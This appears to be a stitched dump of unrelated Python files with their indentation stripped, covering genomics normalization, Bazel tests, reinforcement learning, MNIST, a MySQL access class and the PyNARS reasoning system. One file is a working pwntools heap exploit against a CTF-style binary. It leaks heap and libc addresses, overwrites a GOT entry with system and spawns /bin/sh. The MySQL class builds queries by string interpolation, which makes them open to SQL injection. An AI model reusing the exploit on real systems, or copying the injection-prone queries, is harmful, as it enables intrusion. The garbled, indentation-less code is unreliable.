os.chdir(sgRNAReadCountDir)
for filename in FileNames_u:
print('Processing file '+filename+' ...')
GuideCounts = pandas.read_table(filename,sep='\t',names=colnames_u)
L = len(GuideCounts)
sgIDs = list(GuideCounts['sgRNA'])
geneIDs = list(GuideCounts['gene'])
ReadsPerGuide = list(GuideCounts['counts'])
N = sum(ReadsPerGuide)
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(ReadsPerGuide[k]/N * N0)) for k in range(L)]
else:
ReadsPerGuide_0 = [ReadsPerGuide[k]/N * N0 for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
print('Processing file '+filename+' ...')
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
N = sum(ReadsPerGene)
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/N * N0)) for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/N * N0 for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Normalization to mean total read count across replicates
# ------------------------------------------------------------
elif norm == 'total':
print('Normalizing to mean total read count ...')
os.chdir(sgRNAReadCountDir)
TotalCounts = list()
for filename in FileNames_u:
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
x = list(SampleFile['counts'])
TotalCounts.append(numpy.sum(x))
MeanCount = numpy.mean(TotalCounts)
# sgRNA counts
os.chdir(sgRNAReadCountDir)
for filename in FileNames_u:
print('Processing file '+filename+' ...')
GuideCounts = pandas.read_table(filename,sep='\t',names=colnames_u)
L = len(GuideCounts)
sgIDs = list(GuideCounts['sgRNA'])
geneIDs = list(GuideCounts['gene'])
ReadsPerGuide = list(GuideCounts['counts'])
N = sum(ReadsPerGuide)
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(ReadsPerGuide[k]/N * MeanCount)) for k in range(L)]
else:
ReadsPerGuide_0 = [ReadsPerGuide[k]/N * MeanCount for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
print('Processing file '+filename+' ...')
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
N = sum(ReadsPerGene)
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/N * MeanCount)) for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/N * MeanCount for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Normalization by size-factor (Love et al., Genome Biol 2014)
# ------------------------------------------------------------
elif norm == 'size':
print('Normalizing by size-factors ...')
# Establish data frame
os.chdir(sgRNAReadCountDir)
filename = FileNames_u[0]
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
sgIDs = list(SampleFile['sgRNA'])
geneIDs = list(SampleFile['gene'])
L = len(sgIDs)
RawCounts = pandas.DataFrame(data = {'sgRNA': [sgIDs[k] for k in range(L)],
'gene': [geneIDs[k] for k in range(L)]},
columns = ['sgRNA','gene'])
SizeFactors = pandas.DataFrame(data = {'sgRNA': [sgIDs[k] for k in range(L)],
'gene': [geneIDs[k] for k in range(L)]},
columns = ['sgRNA','gene'])
# Compute geometric means for all sgRNAs
print('Computing geometric means ...')
for filename in FileNames_u:
sample = filename[0:-16]
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
x = list(SampleFile['counts'])
RawCounts[sample] = x
SizeFactors[sample] = [x[k] if x[k]>0 else x[k]+eps for k in range(L)]
geomean = [sc.gmean(list(SizeFactors.iloc[k,2:])) for k in range(L)]
SizeFactors['Geom mean'] = geomean
# Compute size-factors for each sgRNA and each sample
print('Computing sgRNA size-factors ...')
for filename in FileNames_u:
sample = filename[0:-16]
x = SizeFactors[sample]
g0 = SizeFactors['Geom mean']
x0_k = [x[k]/g0[k] for k in range(L)]
SizeFactors[sample+' sgRNA size-factors'] = [x0_k[k] for k in range(L)]
# Compute size-factor for each sample
print('Computing sample size-factors ...')
for filename in FileNames_u:
sample = filename[0:-16]
SizeFactors[sample+' size-factor'] = numpy.median(SizeFactors[sample+' sgRNA size-factors'])
# Write size-factor dataframe
SizeFactors.to_csv('Size-factors.txt',sep='\t',index=False)
# Write normalized counts dataframe
print('Writing normalized read counts ...')
# sgRNA counts
for filename in FileNames_u:
sample = filename[0:-16]
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(RawCounts[sample][k]/SizeFactors[sample+' size-factor'][k])) \
for k in range(L)]
else:
ReadsPerGuide_0 = [RawCounts[sample][k]/SizeFactors[sample+' size-factor'][k] for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
sample = filename[0:-15]
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/SizeFactors[sample+' size-factor'][j])) \
for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/SizeFactors[sample+' size-factor'][j] for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Spelling error catch
# ------------------------------------------------------------
else:
print('### ERROR: Check spelling of Normalization parameter in configuration file! ###')
# --------------------------------------
# Time stamp
# --------------------------------------
os.chdir(ScriptsDir)
end = time.time()
# Final time stamp
print('------------------------------------------------')
print('Script completed.')
sec_elapsed = end - start
if sec_elapsed < 60:
time_elapsed = sec_elapsed
print('Time elapsed (Total) [secs]: ' + '%.3f' % time_elapsed +'\n')
elif sec_elapsed < 3600:
time_elapsed = sec_elapsed/60
print('Time elapsed (Total) [mins]: ' + '%.3f' % time_elapsed +'\n')
else:
time_elapsed = sec_elapsed/3600
print('Time elapsed (Total) [hours]: ' + '%.3f' % time_elapsed +'\n')
if __name__ == "__main__":
Normalization()
| 11,846 | 3,605 |
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from common import BazelKotlinTestCase
class TestRules(BazelKotlinTestCase):
def setUp(self):
self._pkg = "tests/smoke"
def test_merge_resource_jar(self):
jar = self.buildJarGetZipFile("test_merge_resourcesjar", "jar")
self.assertJarContains(jar, "testresources/AClass.class", "testresources/BClass.class")
self.assertJarContains(jar, "pkg/file.txt")
def test_embed_resources(self):
jar = self.buildJarGetZipFile("test_embed_resources", "jar")
self.assertJarContains(jar, "testresources/AClass.class", "testresources/BClass.class")
self.assertJarContains(jar, "tests/smoke/testresources/resources/one/two/aFile.txt", "tests/smoke/testresources/resources/one/alsoAFile.txt")
def test_embed_resources_strip_prefix(self):
jar = self.buildJarGetZipFile("test_embed_resources_strip_prefix", "jar")
self.assertJarContains(jar, "testresources/AClass.class", "testresources/BClass.class")
self.assertJarContains(jar, "one/two/aFile.txt", "one/alsoAFile.txt")
def test_test_targets_launch_correctly(self):
self.buildLaunchExpectingSuccess("junittest", command="test")
def test_bin_targets_launch_correctly_with_data(self):
self.buildLaunchExpectingSuccess("helloworld")
def test_conventional_strip_resources(self):
jar = self.buildJarGetZipFile("conventional_strip_resources", "jar")
self.assertJarContains(jar, "main.txt", "test.txt")
def test_export_ct_propagation(self):
self.buildJar("propagation_ct_consumer")
def test_export_ct_propagation_fail_on_runtime(self):
self.buildJarExpectingFail("propagation_ct_consumer_fail_on_runtime")
def test_export_rt_propagation(self):
self.buildLaunchExpectingSuccess("propagation_rt_via_export_consumer")
def test_export_rt_propagation_via_dep(self):
self.buildLaunchExpectingSuccess("propagation_rt_via_runtime_deps_consumer")
def test_mixed_mode_compilation(self):
self.buildLaunchExpectingSuccess("hellojava")
# re-enable this test, and ensure the srcjar includes java sources when mixed mode.
# def test_srcjar(self):
# jar = self.buildJarGetZipFile("testresources", "srcjar")
# self.assertJarContains(jar, "testresources/AClass.kttestresources/ConsumerLib.kt")
if __name__ == '__main__':
unittest.main()
| 3,022 | 966 |
from pwn import *
r = process("./chart")
raw_input("$")
def register(type_, ID, PW, name, profile=""): # user 1, composer 2
r.send("2\n")
print r.recvuntil("Type :")
r.send(str(type_)+"\n")
print r.recvuntil("ID : ")
r.send(ID+"\n")
print r.recvuntil("PW : ")
r.send(PW+"\n")
print r.recvuntil("Name : ")
r.send(name+"\n")
if(type_ == 1):
print r.recvuntil(">")
else:
print r.recvuntil("Profile : ")
r.send(profile+"\n")
print r.recvuntil(">")
def login(ID, PW):
r.send("1\n")
print r.recvuntil("ID :")
r.send(ID+"\n")
print r.recvuntil("PW :")
r.send(PW+"\n")
print r.recvuntil(">")
def writeMusic(name, lyric):
r.send("1\n")
print r.recvuntil("Name : ")
r.send(name+"\n")
print r.recvuntil("Lyrics : ")
r.send(lyric+"\n")
print r.recvuntil(">")
def deleteMusic(index):
r.send("2\n")
print r.recvuntil("Index : ")
r.send(str(index)+"\n")
print r.recvuntil(">")
def editProfile(newProfile):
r.send("3\n")
print r.recvuntil("Edit Profile : ")
r.send(newProfile+"\n")
print r.recvuntil(">")
def editMusic(musicIdx, newLyric):
r.send("4\n")
print r.recvuntil("Index :")
r.send(str(musicIdx)+"\n")
r.send(newLyric+"\n")
print r.recvuntil(">")
def logOut(type_):
if type_== 1: # user
r.send("9\n")
print r.recvuntil(">")
else: # composer
r.send("5\n")
print r.recvuntil(">")
def createVeryBox(boxName):
r.send("1\n")
print r.recvuntil("Box Name :")
r.send(boxName+"\n")
print r.recvuntil(">")
def deleteVeryBox(boxIndex):
r.send("2\n")
print r.recvuntil("Index :")
r.send(str(boxIndex)+"\n")
print r.recvuntil(">")
def buyMusic(index):
r.send("3\n")
print r.recvuntil("Index :")
r.send(str(index)+"\n")
print r.recvuntil(">")
def putMusicBox(boxIndex, musicIndex):
r.send("4\n")
print r.recvuntil("box :")
r.send(str(boxIndex)+"\n")
print r.recvuntil("box? > ")
r.send(str(musicIndex)+"\n")
print r.recvuntil(">")
def moveBox2Box(destIdx, srcIdx, x, y):
r.send("5\n")
print r.recvuntil("index :")
r.send(str(destIdx)+"\n")
print r.recvuntil("index :")
r.send(str(srcIdx)+"\n")
print r.recvuntil("x :")
r.send(str(x)+"\n")
print r.recvuntil("y :")
r.send(str(y)+"\n")
print r.recvuntil(">")
def deleteMusicU(musicIndex):
r.send("8\n")
print r.recvuntil("Index :")
r.send(str(musicIndex)+"\n")
print r.recvuntil(">")
print r.recvuntil(">")
register(1, "mathboy", "mathboy", "mathboy")
register(2, "mitsuha", "mitsuha", "mitsuha", "A"*0x40)
login("mitsuha", "mitsuha") # composer now!
writeMusic("music1", "music1 hello")
writeMusic("sex", "sex")
logOut(2) # composer logout
register(2, "sexma", "sex", "sex", "B"*0x40) # for attack
login("sexma", "sex") # write for attackvec
writeMusic("aaaaaaaa", "b"*0x39) # write for attackvec, music idx=2
logOut(2)
login("mathboy", "mathboy") # user now!
createVeryBox("myBox")
buyMusic(0)
putMusicBox(0, 0) # go music0 to box 0.
deleteMusicU(0)
logOut(1) # user logout
login("mitsuha", "mitsuha")
deleteMusic(0)
logOut(2)
login("mathboy", "mathboy") # user again!
moveBox2Box(0, 0, 0, 0) # 0, 0 -> 0, 0, reference counting bug occured.
createVeryBox(p64(0x607340)+"\n")
r.send("6\n")
print r.recvuntil("--\n0. ")
recved = r.recvuntil("\n")[:-1]
recved += "\x00"*(8-len(recved))
heap = u64(recved)
print r.recvuntil(">")
print "heap addr: " + hex(heap)
createVeryBox("sexMaster") # second box
buyMusic(1)
putMusicBox(2, 0) # go music1 to box 2
deleteMusicU(0)
logOut(1)
login("mitsuha", "mitsuha")
deleteMusic(1)
logOut(2)
login("mathboy", "mathboy")
moveBox2Box(2, 2, 0, 0)
logOut(1) # logout User
login("mitsuha", "mitsuha")
editProfile(p64(heap+0x350)+p64(0x0)+"A"*8+p64(heap-0x270))
logOut(2) # logout Composer
register(1, p64(heap+0xc0), "P"*0x40, "Q"*0x40)
login("sexma", "sex") # login for attack
editProfile("B"*0x30+p64(0x0)+p64(0x71))
editMusic(2, p64(0x0)+p64(0x21)+"b"*0x20+p64(0x0)+"\x21")
logOut(2)
login("mathboy", "mathboy")
deleteVeryBox(2)
logOut(1) # logout User
register(2, "payload", "payload", "payload", "A"*0x60) # overlapped!
login("payload", "payload")
payload = p64(0x0) + p64(0x31)
payload += p64(heap+0x3b0)
payload += p64(0x605030)
editProfile(payload)
logOut(2)
login("mathboy", "mathboy")
buyMusic(2)
r.send("7\n")
print r.recvuntil("Lyrics : ")
recved = r.recv(6)
libc = u64(recved+"\x00\x00")
libc_base = libc - 0x66bf10
system = libc_base + 0x45390
print r.recvuntil(">")
print "libc: " + hex(libc)
logOut(1)
login("sexma", "sex") # to edit
editMusic(2, p64(system)[:6]) # got overwrite!
logOut(2)
login("mathboy", "mathboy")
createVeryBox("/bin/sh")
r.send("2\n")
print r.recvuntil("Index :")
r.send("2\n") # trigger system("/bin/sh")!
r.interactive()
| 4,655 | 2,236 |
from citylearn import CityLearn, building_loader, auto_size
from energy_models import HeatPump, EnergyStorage, Building
import matplotlib.pyplot as plt
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
import collections
import gym
from gym.utils import seeding
from gym import core, spaces
import os
import ptan
import time
import argparse
import model, common
from matplotlib.pyplot import figure
import numpy as np
class AgentD4PG(ptan.agent.BaseAgent):
"""
Agent implementing noisy agent
"""
def __init__(self, net, device="cpu", epsilon=1.0):
self.net = net
self.device = device
self.epsilon = epsilon
def __call__(self, states, agent_states):
states_v = ptan.agent.float32_preprocessor(states).to(self.device)
mu_v = self.net(states_v)
actions = mu_v.data.cpu().numpy()
actions += self.epsilon * np.random.normal(size=actions.shape)
actions = np.clip(actions, -1, 1)
return actions, agent_states
class DDPGActor(nn.Module):
def __init__(self, obs_size, act_size):
super(DDPGActor, self).__init__()
self.net = nn.Sequential(
nn.Linear(obs_size, 4),
nn.ReLU(),
nn.Linear(4, 4),
nn.ReLU(),
nn.Linear(4, act_size),
nn.Tanh()
)
def forward(self, x):
return self.net(x)
class DDPGCritic(nn.Module):
def __init__(self, obs_size, act_size):
super(DDPGCritic, self).__init__()
self.obs_net = nn.Sequential(
nn.Linear(obs_size, 8),
nn.BatchNorm1d(8),
nn.ReLU(),
)
self.out_net = nn.Sequential(
nn.Linear(8 + act_size, 6),
nn.BatchNorm1d(6),
nn.ReLU(),
nn.Linear(6, 1)
)
def forward(self, x, a):
obs = self.obs_net(x)
return self.out_net(torch.cat([obs, a], dim=1))
from pathlib import Path
data_folder = Path("data/")
demand_file = data_folder / "AustinResidential_TH.csv"
weather_file = data_folder / 'Austin_Airp_TX-hour.csv'
#building_ids = [4, 5, 9, 16, 21, 26, 33, 36, 49, 59]
building_ids = [4]
heat_pump, heat_tank, cooling_tank = {}, {}, {}
#Ref: Assessment of energy efficiency in electric storage water heaters (2008 Energy and Buildings)
loss_factor = 0.19/24
buildings = {}
for uid in building_ids:
heat_pump[uid] = HeatPump(nominal_power = 9e12, eta_tech = 0.22, t_target_heating = 45, t_target_cooling = 10)
heat_tank[uid] = EnergyStorage(capacity = 9e12, loss_coeff = loss_factor)
cooling_tank[uid] = EnergyStorage(capacity = 9e12, loss_coeff = loss_factor)
buildings[uid] = Building(uid, heating_storage = heat_tank[uid], cooling_storage = cooling_tank[uid], heating_device = heat_pump[uid], cooling_device = heat_pump[uid])
buildings[uid].state_action_space(np.array([24.0, 40.0, 1.001]), np.array([1.0, 17.0, -0.001]), np.array([0.5]), np.array([-0.5]))
building_loader(demand_file, weather_file, buildings)
auto_size(buildings, t_target_heating = 45, t_target_cooling = 10)
env = {}
for uid in building_ids:
env[uid] = CityLearn(demand_file, weather_file, buildings = {uid: buildings[uid]}, time_resolution = 1, simulation_period = (3500,6000))
env[uid](uid)
if __name__ == "__main__":
N_AGENTS = 2
GAMMA = 0.99
BATCH_SIZE = 5000
LEARNING_RATE_ACTOR = 1e-4
LEARNING_RATE_CRITIC = 1e-3
REPLAY_SIZE = 5000
REPLAY_INITIAL = 100
TEST_ITERS = 120
EPSILON_DECAY_LAST_FRAME = 1000
EPSILON_START = 1.2
EPSILON_FINAL = 0.02
device = torch.device("cpu")
act_net, crt_net, tgt_act_net, tgt_crt_net, agent, exp_source, buffer, act_opt, crt_opt, frame_idx = {}, {}, {}, {}, {}, {}, {}, {}, {}, {}
rew_last_1000, rew, track_loss_critic, track_loss_actor = {}, {}, {}, {}
# for uid in buildings:
# env[uid].reset()
for uid in building_ids:
#Create as many actor and critic nets as number of agents
#Actor: states_agent_i -> actions_agent_i
act_net[uid] = DDPGActor(buildings[uid].observation_spaces.shape[0], buildings[uid].action_spaces.shape[0]).to(device)
#Critic: states_all_agents + actions_all_agents -> Q-value_agent_i [1]
crt_net[uid] = DDPGCritic(buildings[uid].observation_spaces.shape[0], buildings[uid].action_spaces.shape[0]).to(device)
tgt_act_net[uid] = ptan.agent.TargetNet(act_net[uid])
tgt_crt_net[uid] = ptan.agent.TargetNet(crt_net[uid])
agent[uid] = model.AgentD4PG(act_net[uid], device=device)
exp_source[uid] = ptan.experience.ExperienceSourceFirstLast(env[uid], agent[uid], gamma=GAMMA, steps_count=1)
buffer[uid] = ptan.experience.ExperienceReplayBuffer(exp_source[uid], buffer_size=REPLAY_SIZE)
act_opt[uid] = optim.Adam(act_net[uid].parameters(), lr=LEARNING_RATE_ACTOR)
crt_opt[uid] = optim.Adam(crt_net[uid].parameters(), lr=LEARNING_RATE_CRITIC)
frame_idx[uid] = 0
rew_last_1000[uid], rew[uid], track_loss_critic[uid], track_loss_actor[uid] = [], [], [], []
batch, states_v, actions_v, rewards_v, dones_mask, last_states_v, q_v, last_act_v, q_last_v, q_ref_v, critic_loss_v, cur_actions_v, actor_loss_v = {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}
cost, price_list, buffer_reward = {},{},{}
for uid in buildings:
cost[uid] = []
price_list[uid] = []
buffer_reward[uid] = []
while not env[building_ids[-1]]._terminal():
if frame_idx[4]%100 == 0:
print(frame_idx[uid])
for uid in buildings:
# print(env[uid].time_step)
agent[uid].epsilon = max(EPSILON_FINAL, EPSILON_START - frame_idx[uid] / EPSILON_DECAY_LAST_FRAME)
frame_idx[uid] += 1
buffer[uid].populate(1)
# print(buffer[uid].buffer[-1])
# print(env[uid].buildings[uid].time_step)
price = env[uid].total_electric_consumption[-1]*3e-5 + 0.045
price_list[uid].append(price)
for uid in buildings:
buffer_reward[uid].append(buffer[uid].buffer[-1].reward)
electricity_cost = buffer[uid].buffer[-1].reward*price
cost[uid].append(-electricity_cost)
buffer[uid].buffer[-1] = buffer[uid].buffer[-1]._replace(reward=electricity_cost)
if len(buffer[uid]) < REPLAY_INITIAL:
continue
for uid in buildings:
for k in range(6):
batch[uid] = buffer[uid].sample(BATCH_SIZE)
states_v[uid], actions_v[uid], rewards_v[uid], dones_mask[uid], last_states_v[uid] = common.unpack_batch_ddqn(batch[uid], device)
# TRAIN CRITIC
crt_opt[uid].zero_grad()
#Obtaining Q' using critic net with parameters teta_Q'
q_v[uid] = crt_net[uid](states_v[uid], actions_v[uid])
#Obtaining estimated optimal actions a|teta_mu from target actor net and from s_i+1.
last_act_v[uid] = tgt_act_net[uid].target_model(last_states_v[uid]) #<----- Actor to train Critic
#Obtaining Q'(s_i+1, a|teta_mu) from critic net Q'
q_last_v[uid] = tgt_crt_net[uid].target_model(last_states_v[uid], last_act_v[uid])
q_last_v[uid][dones_mask[uid]] = 0.0
#Q_target used to train critic net Q'
q_ref_v[uid] = rewards_v[uid].unsqueeze(dim=-1) + q_last_v[uid] * GAMMA
critic_loss_v[uid] = F.mse_loss(q_v[uid], q_ref_v[uid].detach())
critic_loss_v[uid].backward()
crt_opt[uid].step()
# TRAIN ACTOR
act_opt[uid].zero_grad()
#Obtaining estimated optimal current actions a|teta_mu from actor net and from s_i
cur_actions_v[uid] = act_net[uid](states_v[uid])
#Actor loss = mean{ -Q_i'(s_i, a|teta_mu) }
actor_loss_v[uid] = -crt_net[uid](states_v[uid], cur_actions_v[uid]) #<----- Critic to train Actor
actor_loss_v[uid] = actor_loss_v[uid].mean()
#Find gradient of the loss and backpropagate to perform the updates of teta_mu
actor_loss_v[uid].backward()
act_opt[uid].step()
if frame_idx[uid] % 1 == 0:
tgt_act_net[uid].alpha_sync(alpha=1 - 0.1)
tgt_crt_net[uid].alpha_sync(alpha=1 - 0.1)
from matplotlib.pyplot import figure
#Plotting all the individual actions
print(env)
figure(figsize=(18, 6))
for uid in buildings:
print(env[uid].buildings[uid].time_step)
plt.plot(env[uid].action_track[uid][2400:2500])
plt.show()
| 8,761 | 3,252 |
import pickle
import sys
from mnist import MNIST
from NeuralNetwork import *
import numpy as np
from PIL import Image
def vectorizeResult(x):
e = np.zeros((10, 1))
e[x] = 1.0
return e
def getImageArray(fileName):
ls = []
for p in np.invert(Image.open(fileName).convert('L')).ravel():
ls.append([p])
return np.array(ls)/255
def createNeuralNetwork(layers, name):
layers = list(map(int, layers))
NN = NeuralNetwork(layers)
data = MNIST('Data')
trainingInput, trainingOutput = data.load_training()
testingInput, testingOutput = data.load_testing()
trainingInput = np.array(trainingInput)/255
testingInput = np.array(testingInput)/255
trainingInput = [np.reshape(x, (layers[0], 1)) for x in trainingInput]
trainingOutput = [vectorizeResult(x) for x in trainingOutput]
trainingData = list(zip(trainingInput, trainingOutput))
testingInput = [np.reshape(x, (layers[0], 1)) for x in testingInput]
testingData = list(zip(testingInput, testingOutput))
NN.stochasticGradientDescent(trainingData, 50, 30, 2.0, testingData)
binaryFile = open(name, mode='wb')
neuralNetwork = pickle.dump(NN, binaryFile)
binaryFile.close()
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Creating a neural network...")
createNeuralNetwork(sys.argv[1:-1], sys.argv[-1])
print("Done")
else:
fileName = sys.argv[1]
NN = pickle.load(open(fileName, 'rb'))
while True:
numberFile = input("What file would you like to read? ")
if numberFile == '':
break
elif numberFile == 'all':
for i in range(10):
f = str(i) + '.png'
val = np.argmax(NN.propagate(getImageArray(f)))
print("written number: {0}. Network finds a: {1}. {2}".format(i, val, val == i))
else:
numberFile += '.png'
print(np.argmax(NN.propagate(getImageArray(numberFile))))
| 2,041 | 657 |
import json
def pretty_print(text):
"""This utils used for print pretty json"""
print json.dumps(text, indent=2, sort_keys=True)
| 139 | 47 |
import MySQLdb
import sys
sys.path.append('C:/Users/900152/Documents/Dados/TrabalhoPython/JM_exerc')
from model.Back_model import BackEnd
class BackDb:
def select_all(self):
comand = 'SELECT * FROM topskills01.02_JM_BackEnd;'
selectcomand = self.cursor.execute(comand)
return selectcomand
def select_by_id(self,id):
comand = f"SELECT * FROM topskills01.02_JM_BackEnd WHERE ID={id}"
idcomand = self.cursor.execute(comand)
return idcomand
def update(self, back : BackEnd):
comand = f"UPDATE topskills01.02_JM_BackEnd SET Nome = {back.Nome}, Descricao = '{back.Descricao}', Versao = '{back.Versao}' WHERE ID = {back.id}"
self.conexao.commit()
def save(self, back: BackEnd):
comand = f"""INSERT INTO topskills01.02_JM_BackEnd
(
Nome
,Descricao
,Versao
)
VALUES(
'{back.Nome}'
,'{back.Descricao}'
,'{back.Versao}'
)"""
savecomand = self.cursor.execute(comand)
return savecomand
def delete(self,id):
comand = f"DELETE FROM topskills01.02_JM_BackEnd WHERE ID={id}"
deletecomand = self.cursor.execute(comand)
return deletecomand
| 1,286 | 455 |
# DMaaP Bus Controller interface library | 40 | 9 |
from pynars.Config import Enable
from pynars.NAL.Inference.LocalRules import solve_query, solution_query, solution_question
from pynars.NAL.MetaLevelInference.VariableSubstitution import unification__var_const
from pynars.NARS.DataStructures._py.Link import TaskLink
from pynars.Narsese._py.Sentence import Goal, Judgement, Question
from pynars.Narsese import Statement, Term, Sentence, Budget, Task
from pynars.Narsese._py.Task import Belief, Desire
from .Concept import Concept
from .Bag import Bag
from pynars.NAL.Functions.Tools import revisible
from pynars.NAL.Inference import local__revision
class Memory:
def __init__(self, capacity: int, n_buckets: int = None, take_in_order: bool = False) -> None:
self.concepts = Bag(capacity, n_buckets=n_buckets, take_in_order=take_in_order)
def accept(self, task: Task):
'''
**Accept task**: Accept a task from the `Overall Experience`, and link it from all directly related concepts. Ref: *The Conceptual Design of OpenNARS 3.1.0*.
'''
# merging the new task as a concept into the memory
concept: Concept = Concept._conceptualize(self, task.term, task.budget)
if concept is None: return None # The memroy is full. The concept fails to get into the memory.
# then process each task according to its type
task_revised, goal_derived, answers_question, answer_quest = None, None, None, None
if task.is_judgement:
# revised the belief if there has been one, and try to solve question if there has been a corresponding one.
task_revised, answers_question = self._accept_judgement(task, concept)
elif task.is_goal:
task_revised, belief_selected = self._accept_goal(task, concept)
elif task.is_question:
# add the question to the question-table of the concept, and try to find a solution.
answers_question = self._accept_question(task, concept)
elif task.is_quest:
answer_quest = self._accept_quest(task, concept)
else:
raise f"Invalid type {task.sentence.punct}"
# Build the concepts corresponding to the terms of those components within the task.
concept.accept(task, self.concepts, conceptualize=False)
if Enable.temporal_rasoning or Enable.operation:
# if (!task.sentence.isEternal() && !(task.sentence.term instanceof Operation)) {
# globalBuffer.eventInference(task, cont, false); //can be triggered by Buffer itself in the future
# }
raise # TODO
return task_revised, goal_derived, answers_question, answer_quest
def _accept_judgement(self, task: Task, concept: Concept):
''''''
belief_revised = None
answers = None
if Enable.operation: raise # InternalExperienceBuffer.handleOperationFeedback(task, nal);
if Enable.anticipation: raise # ProcessAnticipation.confirmAnticipation(task, concept, nal);
# j1: Judgement = task.sentence
belief: Belief = concept.match_belief(task.sentence)
if belief is not None:
# j2: Judgement = belief.sentence
if revisible(task, belief):
if Enable.temporal_rasoning:
'''
nal.setTheNewStamp(newStamp, oldStamp, nal.time.time());
final Sentence projectedBelief = oldBelief.projection(nal.time.time(), newStamp.getOccurrenceTime(), concept.memory);
if (projectedBelief!=null) {
nal.setCurrentBelief(projectedBelief);
revision(judg, projectedBelief, concept, false, nal);
task.setAchievement(calcTaskAchievement(task.sentence.truth, projectedBelief.truth));
}
'''
raise
belief_revised = local__revision(task, belief) # TODO: handling the stamps
# reduce priority by achieving level
task.reduce_budget_by_achieving_level(belief)
if task.budget.is_above_thresh:
'''final int nnq = concept.questions.size();
for (int i = 0; i < nnq; i++) {
trySolution(judg, concept.questions.get(i), nal, true);
}
final int nng = concept.desires.size();
for (int i = 0; i < nng; i++) {
trySolution(judg, concept.desires.get(i), nal, true);
}'''
concept.add_belief(task)
# try to solve questions
answers = self._solve_judgement(task, concept)
return belief_revised, answers
def _accept_question(self, task: Task, concept: Concept):
''''''
concept.question_table.add(task, 0.5)
if task.is_query:
answers = self._solve_query(task, concept)
else:
answers = self._solve_question(task, concept)
return answers
def _accept_goal(self, task: Task, concept: Concept):
''''''
desire_revised = None
belief_selected = None
if Enable.operation: raise # InternalExperienceBuffer.handleOperationFeedback(task, nal);
if Enable.anticipation: raise # ProcessAnticipation.confirmAnticipation(task, concept, nal);
g1: Goal = task.sentence
desire: Desire = concept.match_desire(g1)
if desire is not None:
g2: Goal = desire.sentence
if revisible(task, desire):
# TODO: Temporal projection
desire_revised = local__revision(task, desire) # TODO: handling the stamps
# reduce priority by achieving level
task.reduce_budget_by_achieving_level(desire)
if task.budget.is_above_thresh:
'''
for (final Task iQuest : concept.quests ) {
trySolution(task.sentence, iQuest, nal, true);
}
if (beliefT != null) {
// check if the Goal is already satisfied (manipulate budget)
trySolution(beliefT.sentence, task, nal, true);
}
'''
# 1. try to solve questions
# 2. try to solve quests
concept.add_desire(task)
return desire_revised, belief_selected
def _accept_quest(self, task: Task, concept: Concept):
''''''
